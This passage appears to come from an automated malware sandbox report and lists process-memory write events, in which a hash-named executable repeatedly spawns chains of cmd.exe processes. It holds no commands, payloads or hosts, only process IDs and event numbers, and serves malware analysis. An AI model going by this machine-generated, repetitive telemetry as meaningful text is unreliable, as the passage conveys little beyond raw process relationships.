wrote to memory of 1312 232 cmd.exe 157 PID 1312 wrote to memory of 1632 1312 cmd.exe 158 PID 1312 wrote to memory of 1632 1312 cmd.exe 158 PID 1312 wrote to memory of 1632 1312 cmd.exe 158 PID 1312 wrote to memory of 1632 1312 cmd.exe 158 PID 232 wrote to memory of 1840 232 cmd.exe 159 PID 232 wrote to memory of 1840 232 cmd.exe 159 PID 232 wrote to memory of 1840 232 cmd.exe 159 PID 232 wrote to memory of 1840 232 cmd.exe 159 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 160 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 160 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 160 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 160 PID 972 wrote to memory of 1480 972 cmd.exe 162 PID 972 wrote to memory of 1480 972 cmd.exe 162 PID 972 wrote to memory of 1480 972 cmd.exe 162 PID 972 wrote to memory of 1480 972 cmd.exe 162 PID 972 wrote to memory of 1820 972 cmd.exe 163 PID 972 wrote to memory of 1820 972 cmd.exe 163 PID 972 wrote to memory of 1820 972 cmd.exe 163 PID 972 wrote to memory of 1820 972 cmd.exe 163 PID 972 wrote to memory of 1752 972 cmd.exe 164 PID 972 wrote to memory of 1752 972 cmd.exe 164 PID 972 wrote to memory of 1752 972 cmd.exe 164 PID 972 wrote to memory of 1752 972 cmd.exe 164 PID 1752 wrote to memory of 1804 1752 cmd.exe 165 PID 1752 wrote to memory of 1804 1752 cmd.exe 165 PID 1752 wrote to memory of 1804 1752 cmd.exe 165 PID 1752 wrote to memory of 1804 1752 cmd.exe 165 PID 972 wrote to memory of 916 972 cmd.exe 166 PID 972 wrote to memory of 916 972 cmd.exe 166 PID 972 wrote to memory of 916 972 cmd.exe 166 PID 972 wrote to memory of 916 972 cmd.exe 166 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 167 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 167 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 167 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 167 PID 1860 wrote to memory of 864 1860 cmd.exe 169 PID 1860 wrote to memory of 864 1860 cmd.exe 169 PID 1860 wrote to memory of 864 1860 cmd.exe 169 PID 1860 wrote to memory of 864 1860 cmd.exe 169 PID 1860 wrote to memory of 1896 1860 cmd.exe 170 PID 1860 wrote to memory of 1896 1860 cmd.exe 170 PID 1860 wrote to memory of 1896 1860 cmd.exe 170 PID 1860 wrote to memory of 1896 1860 cmd.exe 170 PID 1860 wrote to memory of 524 1860 cmd.exe 172 PID 1860 wrote to memory of 524 1860 cmd.exe 172 PID 1860 wrote to memory of 524 1860 cmd.exe 172 PID 1860 wrote to memory of 524 1860 cmd.exe 172 PID 524 wrote to memory of 756 524 cmd.exe 173 PID 524 wrote to memory of 756 524 cmd.exe 173 PID 524 wrote to memory of 756 524 cmd.exe 173 PID 524 wrote to memory of 756 524 cmd.exe 173 PID 1860 wrote to memory of 1028 1860 cmd.exe 174 PID 1860 wrote to memory of 1028 1860 cmd.exe 174 PID 1860 wrote to memory of 1028 1860 cmd.exe 174 PID 1860 wrote to memory of 1028 1860 cmd.exe 174 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 175 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 175 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 175 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 175 PID 1984 wrote to memory of 216 1984 cmd.exe 177 PID 1984 wrote to memory of 216 1984 cmd.exe 177 PID 1984 wrote to memory of 216 1984 cmd.exe 177 PID 1984 wrote to memory of 216 1984 cmd.exe 177 PID 1984 wrote to memory of 1168 1984 cmd.exe 178 PID 1984 wrote to memory of 1168 1984 cmd.exe 178 PID 1984 wrote to memory of 1168 1984 cmd.exe 178 PID 1984 wrote to memory of 1168 1984 cmd.exe 178 PID 1984 wrote to memory of 1804 1984 cmd.exe 179 PID 1984 wrote to memory of 1804 1984 cmd.exe 179 PID 1984 wrote to memory of 1804 1984 cmd.exe 179 PID 1984 wrote to memory of 1804 1984 cmd.exe 179 PID 1804 wrote to memory of 484 1804 cmd.exe 180 PID 1804 wrote to memory of 484 1804 cmd.exe 180 PID 1804 wrote to memory of 484 1804 cmd.exe 180 PID 1804 wrote to memory of 484 1804 cmd.exe 180 PID 1984 wrote to memory of 1080 1984 cmd.exe 181 PID 1984 wrote to memory of 1080 1984 cmd.exe 181 PID 1984 wrote to memory of 1080 1984 cmd.exe 181 PID 1984 wrote to memory of 1080 1984 cmd.exe 181 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 182 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 182 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 182 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 182 PID 208 wrote to memory of 296 208 cmd.exe 184 PID 208 wrote to memory of 296 208 cmd.exe 184 PID 208 wrote to memory of 296 208 cmd.exe 184 PID 208 wrote to memory of 296 208 cmd.exe 184 PID 1800 wrote to memory of 1948 1800 cmd.exe 185 PID 1800 wrote to memory of 1948 1800 cmd.exe 185 PID 1800 wrote to memory of 1948 1800 cmd.exe 185 PID 208 wrote to memory of 756 208 cmd.exe 186 PID 208 wrote to memory of 756 208 cmd.exe 186 PID 208 wrote to memory of 756 208 cmd.exe 186 PID 208 wrote to memory of 756 208 cmd.exe 186 PID 208 wrote to memory of 680 208 cmd.exe 187 PID 208 wrote to memory of 680 208 cmd.exe 187 PID 208 wrote to memory of 680 208 cmd.exe 187 PID 208 wrote to memory of 680 208 cmd.exe 187 PID 680 wrote to memory of 1892 680 cmd.exe 188 PID 680 wrote to memory of 1892 680 cmd.exe 188 PID 680 wrote to memory of 1892 680 cmd.exe 188 PID 680 wrote to memory of 1892 680 cmd.exe 188 PID 208 wrote to memory of 1912 208 cmd.exe 189 PID 208 wrote to memory of 1912 208 cmd.exe 189 PID 208 wrote to memory of 1912 208 cmd.exe 189 PID 208 wrote to memory of 1912 208 cmd.exe 189 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 190 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 190 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 190 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 190 PID 932 wrote to memory of 1752 932 cmd.exe 192 PID 932 wrote to memory of 1752 932 cmd.exe 192 PID 932 wrote to memory of 1752 932 cmd.exe 192 PID 932 wrote to memory of 1752 932 cmd.exe 192 PID 932 wrote to memory of 1608 932 cmd.exe 193 PID 932 wrote to memory of 1608 932 cmd.exe 193 PID 932 wrote to memory of 1608 932 cmd.exe 193 PID 932 wrote to memory of 1608 932 cmd.exe 193 PID 932 wrote to memory of 1804 932 cmd.exe 194 PID 932 wrote to memory of 1804 932 cmd.exe 194 PID 932 wrote to memory of 1804 932 cmd.exe 194 PID 932 wrote to memory of 1804 932 cmd.exe 194 PID 1804 wrote to memory of 972 1804 cmd.exe 195 PID 1804 wrote to memory of 972 1804 cmd.exe 195 PID 1804 wrote to memory of 972 1804 cmd.exe 195 PID 1804 wrote to memory of 972 1804 cmd.exe 195 PID 932 wrote to memory of 1984 932 cmd.exe 196 PID 932 wrote to memory of 1984 932 cmd.exe 196 PID 932 wrote to memory of 1984 932 cmd.exe 196 PID 932 wrote to memory of 1984 932 cmd.exe 196 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 197 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 197 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 197 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 197 PID 468 wrote to memory of 280 468 cmd.exe 199 PID 468 wrote to memory of 280 468 cmd.exe 199 PID 468 wrote to memory of 280 468 cmd.exe 199 PID 468 wrote to memory of 280 468 cmd.exe 199 PID 468 wrote to memory of 296 468 cmd.exe 200 PID 468 wrote to memory of 296 468 cmd.exe 200 PID 468 wrote to memory of 296 468 cmd.exe 200 PID 468 wrote to memory of 296 468 cmd.exe 200 PID 1800 wrote to memory of 756 1800 cmd.exe 201 PID 1800 wrote to memory of 756 1800 cmd.exe 201 PID 1800 wrote to memory of 756 1800 cmd.exe 201 PID 468 wrote to memory of 1344 468 cmd.exe 202 PID 468 wrote to memory of 1344 468 cmd.exe 202 PID 468 wrote to memory of 1344 468 cmd.exe 202 PID 468 wrote to memory of 1344 468 cmd.exe 202 PID 1800 wrote to memory of 1468 1800 cmd.exe 204 PID 1800 wrote to memory of 1468 1800 cmd.exe 204 PID 1800 wrote to memory of 1468 1800 cmd.exe 204 PID 1344 wrote to memory of 1892 1344 cmd.exe 203 PID 1344 wrote to memory of 1892 1344 cmd.exe 203 PID 1344 wrote to memory of 1892 1344 cmd.exe 203 PID 1344 wrote to memory of 1892 1344 cmd.exe 203 PID 468 wrote to memory of 1696 468 cmd.exe 205 PID 468 wrote to memory of 1696 468 cmd.exe 205 PID 468 wrote to memory of 1696 468 cmd.exe 205 PID 468 wrote to memory of 1696 468 cmd.exe 205 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 206 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 206 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 206 PID 1116 wrote to memory of 1876 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 206 PID 1876 wrote to memory of 1608 1876 cmd.exe 208 PID 1876 wrote to memory of 1608 1876 cmd.exe 208 PID 1876 wrote to memory of 1608 1876 cmd.exe 208 PID 1876 wrote to memory of 1608 1876 cmd.exe 208 PID 1876 wrote to memory of 548 1876 cmd.exe 209 PID 1876 wrote to memory of 548 1876 cmd.exe 209 PID 1876 wrote to memory of 548 1876 cmd.exe 209 PID 1876 wrote to memory of 548 1876 cmd.exe 209 PID 1876 wrote to memory of 204 1876 cmd.exe 210 PID 1876 wrote to memory of 204 1876 cmd.exe 210 PID 1876 wrote to memory of 204 1876 cmd.exe 210 PID 1876 wrote to memory of 204 1876 cmd.exe 210 PID 204 wrote to memory of 1412 204 cmd.exe 211 PID 204 wrote to memory of 1412 204 cmd.exe 211 PID 204 wrote to memory of 1412 204 cmd.exe 211 PID 204 wrote to memory of 1412 204 cmd.exe 211 PID 1876 wrote to memory of 224 1876 cmd.exe 212 PID 1876 wrote to memory of 224 1876 cmd.exe 212 PID 1876 wrote to memory of 224 1876 cmd.exe 212 PID 1876 wrote to memory of 224 1876 cmd.exe 212 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 213 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 213 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 213 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 213 PID 1936 wrote to memory of 296 1936 cmd.exe 215 PID 1936 wrote to memory of 296 1936 cmd.exe 215 PID 1936 wrote to memory of 296 1936 cmd.exe 215 PID 1936 wrote to memory of 296 1936 cmd.exe 215 PID 1936 wrote to memory of 232 1936 cmd.exe 216 PID 1936 wrote to memory of 232 1936 cmd.exe 216 PID 1936 wrote to memory of 232 1936 cmd.exe 216 PID 1936 wrote to memory of 232 1936 cmd.exe 216 PID 1936 wrote to memory of 680 1936 cmd.exe 217 PID 1936 wrote to memory of 680 1936 cmd.exe 217 PID 1936 wrote to memory of 680 1936 cmd.exe 217 PID 1936 wrote to memory of 680 1936 cmd.exe 217 PID 680 wrote to memory of 928 680 cmd.exe 218 PID 680 wrote to memory of 928 680 cmd.exe 218 PID 680 wrote to memory of 928 680 cmd.exe 218 PID 680 wrote to memory of 928 680 cmd.exe 218 PID 1936 wrote to memory of 864 1936 cmd.exe 219 PID 1936 wrote to memory of 864 1936 cmd.exe 219 PID 1936 wrote to memory of 864 1936 cmd.exe 219 PID 1936 wrote to memory of 864 1936 cmd.exe 219 PID 1116 wrote to memory of 228 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 220 PID 1116 wrote to memory of 228 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 220 PID 1116 wrote to memory of 228 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 220 PID 1116 wrote to memory of 228 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 220 PID 228 wrote to memory of 1080 228 cmd.exe 222 PID 228 wrote to memory of 1080 228 cmd.exe 222 PID 228 wrote to memory of 1080 228 cmd.exe 222 PID 228 wrote to memory of 1080 228 cmd.exe 222 PID 228 wrote to memory of 972 228 cmd.exe 223 PID 228 wrote to memory of 972 228 cmd.exe 223 PID 228 wrote to memory of 972 228 cmd.exe 223 PID 228 wrote to memory of 972 228 cmd.exe 223 PID 228 wrote to memory of 1372 228 cmd.exe 224 PID 228 wrote to memory of 1372 228 cmd.exe 224 PID 228 wrote to memory of 1372 228 cmd.exe 224 PID 228 wrote to memory of 1372 228 cmd.exe 224 PID 1372 wrote to memory of 216 1372 cmd.exe 225 PID 1372 wrote to memory of 216 1372 cmd.exe 225 PID 1372 wrote to memory of 216 1372 cmd.exe 225 PID 1372 wrote to memory of 216 1372 cmd.exe 225 PID 228 wrote to memory of 2016 228 cmd.exe 226 PID 228 wrote to memory of 2016 228 cmd.exe 226 PID 228 wrote to memory of 2016 228 cmd.exe 226 PID 228 wrote to memory of 2016 228 cmd.exe 226 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 227 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 227 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 227 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 227 PID 1096 wrote to memory of 1908 1096 cmd.exe 229 PID 1096 wrote to memory of 1908 1096 cmd.exe 229 PID 1096 wrote to memory of 1908 1096 cmd.exe 229 PID 1096 wrote to memory of 1908 1096 cmd.exe 229 PID 1096 wrote to memory of 1876 1096 cmd.exe 230 PID 1096 wrote to memory of 1876 1096 cmd.exe 230 PID 1096 wrote to memory of 1876 1096 cmd.exe 230 PID 1096 wrote to memory of 1876 1096 cmd.exe 230 PID 1096 wrote to memory of 1420 1096 cmd.exe 231 PID 1096 wrote to memory of 1420 1096 cmd.exe 231 PID 1096 wrote to memory of 1420 1096 cmd.exe 231 PID 1096 wrote to memory of 1420 1096 cmd.exe 231 PID 1420 wrote to memory of 1376 1420 cmd.exe 232 PID 1420 wrote to memory of 1376 1420 cmd.exe 232 PID 1420 wrote to memory of 1376 1420 cmd.exe 232 PID 1420 wrote to memory of 1376 1420 cmd.exe 232 PID 1096 wrote to memory of 232 1096 cmd.exe 233 PID 1096 wrote to memory of 232 1096 cmd.exe 233 PID 1096 wrote to memory of 232 1096 cmd.exe 233 PID 1096 wrote to memory of 232 1096 cmd.exe 233 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 234 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 234 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 234 PID 1116 wrote to memory of 1892 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 234 PID 1892 wrote to memory of 1324 1892 cmd.exe 236 PID 1892 wrote to memory of 1324 1892 cmd.exe 236 PID 1892 wrote to memory of 1324 1892 cmd.exe 236 PID 1892 wrote to memory of 1324 1892 cmd.exe 236 PID 1892 wrote to memory of 1416 1892 cmd.exe 237 PID 1892 wrote to memory of 1416 1892 cmd.exe 237 PID 1892 wrote to memory of 1416 1892 cmd.exe 237 PID 1892 wrote to memory of 1416 1892 cmd.exe 237 PID 1892 wrote to memory of 1896 1892 cmd.exe 238 PID 1892 wrote to memory of 1896 1892 cmd.exe 238 PID 1892 wrote to memory of 1896 1892 cmd.exe 238 PID 1892 wrote to memory of 1896 1892 cmd.exe 238 PID 1896 wrote to memory of 1788 1896 cmd.exe 239 PID 1896 wrote to memory of 1788 1896 cmd.exe 239 PID 1896 wrote to memory of 1788 1896 cmd.exe 239 PID 1896 wrote to memory of 1788 1896 cmd.exe 239 PID 1892 wrote to memory of 1080 1892 cmd.exe 240 PID 1892 wrote to memory of 1080 1892 cmd.exe 240 PID 1892 wrote to memory of 1080 1892 cmd.exe 240 PID 1892 wrote to memory of 1080 1892 cmd.exe 240 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 241 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 241 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 241 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 241 PID 1580 wrote to memory of 1468 1580 cmd.exe 243 PID 1580 wrote to memory of 1468 1580 cmd.exe 243 PID 1580 wrote to memory of 1468 1580 cmd.exe 243 PID 1580 wrote to memory of 1468 1580 cmd.exe 243 PID 1580 wrote to memory of 2016 1580 cmd.exe 244 PID 1580 wrote to memory of 2016 1580 cmd.exe 244 PID 1580 wrote to memory of 2016 1580 cmd.exe 244 PID 1580 wrote to memory of 2016 1580 cmd.exe 244 PID 1580 wrote to memory of 916 1580 cmd.exe 245 PID 1580 wrote to memory of 916 1580 cmd.exe 245 PID 1580 wrote to memory of 916 1580 cmd.exe 245 PID 1580 wrote to memory of 916 1580 cmd.exe 245 PID 916 wrote to memory of 932 916 cmd.exe 246 PID 916 wrote to memory of 932 916 cmd.exe 246 PID 916 wrote to memory of 932 916 cmd.exe 246 PID 916 wrote to memory of 932 916 cmd.exe 246 PID 1580 wrote to memory of 1404 1580 cmd.exe 247 PID 1580 wrote to memory of 1404 1580 cmd.exe 247 PID 1580 wrote to memory of 1404 1580 cmd.exe 247 PID 1580 wrote to memory of 1404 1580 cmd.exe 247 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 248 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 248 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 248 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 248 PID 296 wrote to memory of 1344 296 cmd.exe 250 PID 296 wrote to memory of 1344 296 cmd.exe 250 PID 296 wrote to memory of 1344 296 cmd.exe 250 PID 296 wrote to memory of 1344 296 cmd.exe 250 PID 296 wrote to memory of 1412 296 cmd.exe 251 PID 296 wrote to memory of 1412 296 cmd.exe 251 PID 296 wrote to memory of 1412 296 cmd.exe 251 PID 296 wrote to memory of 1412 296 cmd.exe 251 PID 296 wrote to memory of 1912 296 cmd.exe 252 PID 296 wrote to memory of 1912 296 cmd.exe 252 PID 296 wrote to memory of 1912 296 cmd.exe 252 PID 296 wrote to memory of 1912 296 cmd.exe 252 PID 1912 wrote to memory of 864 1912 cmd.exe 253 PID 1912 wrote to memory of 864 1912 cmd.exe 253 PID 1912 wrote to memory of 864 1912 cmd.exe 253 PID 1912 wrote to memory of 864 1912 cmd.exe 253 PID 296 wrote to memory of 1936 296 cmd.exe 254 PID 296 wrote to memory of 1936 296 cmd.exe 254 PID 296 wrote to memory of 1936 296 cmd.exe 254 PID 296 wrote to memory of 1936 296 cmd.exe 254 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 255 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 255 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 255 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 255 PID 1816 wrote to memory of 1984 1816 cmd.exe 257 PID 1816 wrote to memory of 1984 1816 cmd.exe 257 PID 1816 wrote to memory of 1984 1816 cmd.exe 257 PID 1816 wrote to memory of 1984 1816 cmd.exe 257 PID 1816 wrote to memory of 928 1816 cmd.exe 258 PID 1816 wrote to memory of 928 1816 cmd.exe 258 PID 1816 wrote to memory of 928 1816 cmd.exe 258 PID 1816 wrote to memory of 928 1816 cmd.exe 258 PID 1816 wrote to memory of 1800 1816 cmd.exe 259 PID 1816 wrote to memory of 1800 1816 cmd.exe 259 PID 1816 wrote to memory of 1800 1816 cmd.exe 259 PID 1816 wrote to memory of 1800 1816 cmd.exe 259 PID 1800 wrote to memory of 1780 1800 cmd.exe 260 PID 1800 wrote to memory of 1780 1800 cmd.exe 260 PID 1800 wrote to memory of 1780 1800 cmd.exe 260 PID 1800 wrote to memory of 1780 1800 cmd.exe 260 PID 1816 wrote to memory of 1752 1816 cmd.exe 261 PID 1816 wrote to memory of 1752 1816 cmd.exe 261 PID 1816 wrote to memory of 1752 1816 cmd.exe 261 PID 1816 wrote to memory of 1752 1816 cmd.exe 261 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 262 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 262 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 262 PID 1116 wrote to memory of 1908 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 262 PID 1908 wrote to memory of 1948 1908 cmd.exe 264 PID 1908 wrote to memory of 1948 1908 cmd.exe 264 PID 1908 wrote to memory of 1948 1908 cmd.exe 264 PID 1908 wrote to memory of 1948 1908 cmd.exe 264 PID 1908 wrote to memory of 1372 1908 cmd.exe 265 PID 1908 wrote to memory of 1372 1908 cmd.exe 265 PID 1908 wrote to memory of 1372 1908 cmd.exe 265 PID 1908 wrote to memory of 1372 1908 cmd.exe 265 PID 1908 wrote to memory of 1840 1908 cmd.exe 266 PID 1908 wrote to memory of 1840 1908 cmd.exe 266 PID 1908 wrote to memory of 1840 1908 cmd.exe 266 PID 1908 wrote to memory of 1840 1908 cmd.exe 266 PID 1840 wrote to memory of 212 1840 cmd.exe 267 PID 1840 wrote to memory of 212 1840 cmd.exe 267 PID 1840 wrote to memory of 212 1840 cmd.exe 267 PID 1840 wrote to memory of 212 1840 cmd.exe 267 PID 1908 wrote to memory of 204 1908 cmd.exe 268 PID 1908 wrote to memory of 204 1908 cmd.exe 268 PID 1908 wrote to memory of 204 1908 cmd.exe 268 PID 1908 wrote to memory of 204 1908 cmd.exe 268 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 269 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 269 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 269 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 269 PID 524 wrote to memory of 848 524 cmd.exe 271 PID 524 wrote to memory of 848 524 cmd.exe 271 PID 524 wrote to memory of 848 524 cmd.exe 271 PID 524 wrote to memory of 848 524 cmd.exe 271 PID 524 wrote to memory of 1028 524 cmd.exe 272 PID 524 wrote to memory of 1028 524 cmd.exe 272 PID 524 wrote to memory of 1028 524 cmd.exe 272 PID 524 wrote to memory of 1028 524 cmd.exe 272 PID 524 wrote to memory of 1376 524 cmd.exe 273 PID 524 wrote to memory of 1376 524 cmd.exe 273 PID 524 wrote to memory of 1376 524 cmd.exe 273 PID 524 wrote to memory of 1376 524 cmd.exe 273 PID 1376 wrote to memory of 1080 1376 cmd.exe 274 PID 1376 wrote to memory of 1080 1376 cmd.exe 274 PID 1376 wrote to memory of 1080 1376 cmd.exe 274 PID 1376 wrote to memory of 1080 1376 cmd.exe 274 PID 524 wrote to memory of 680 524 cmd.exe 275 PID 524 wrote to memory of 680 524 cmd.exe 275 PID 524 wrote to memory of 680 524 cmd.exe 275 PID 524 wrote to memory of 680 524 cmd.exe 275 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 276 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 276 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 276 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 276 PID 468 wrote to memory of 224 468 cmd.exe 278 PID 468 wrote to memory of 224 468 cmd.exe 278 PID 468 wrote to memory of 224 468 cmd.exe 278 PID 468 wrote to memory of 224 468 cmd.exe 278 PID 468 wrote to memory of 1952 468 cmd.exe 279 PID 468 wrote to memory of 1952 468 cmd.exe 279 PID 468 wrote to memory of 1952 468 cmd.exe 279 PID 468 wrote to memory of 1952 468 cmd.exe 279 PID 468 wrote to memory of 972 468 cmd.exe 280 PID 468 wrote to memory of 972 468 cmd.exe 280 PID 468 wrote to memory of 972 468 cmd.exe 280 PID 468 wrote to memory of 972 468 cmd.exe 280 PID 972 wrote to memory of 916 972 cmd.exe 281 PID 972 wrote to memory of 916 972 cmd.exe 281 PID 972 wrote to memory of 916 972 cmd.exe 281 PID 972 wrote to memory of 916 972 cmd.exe 281 PID 468 wrote to memory of 1864 468 cmd.exe 282 PID 468 wrote to memory of 1864 468 cmd.exe 282 PID 468 wrote to memory of 1864 468 cmd.exe 282 PID 468 wrote to memory of 1864 468 cmd.exe 282 PID 1116 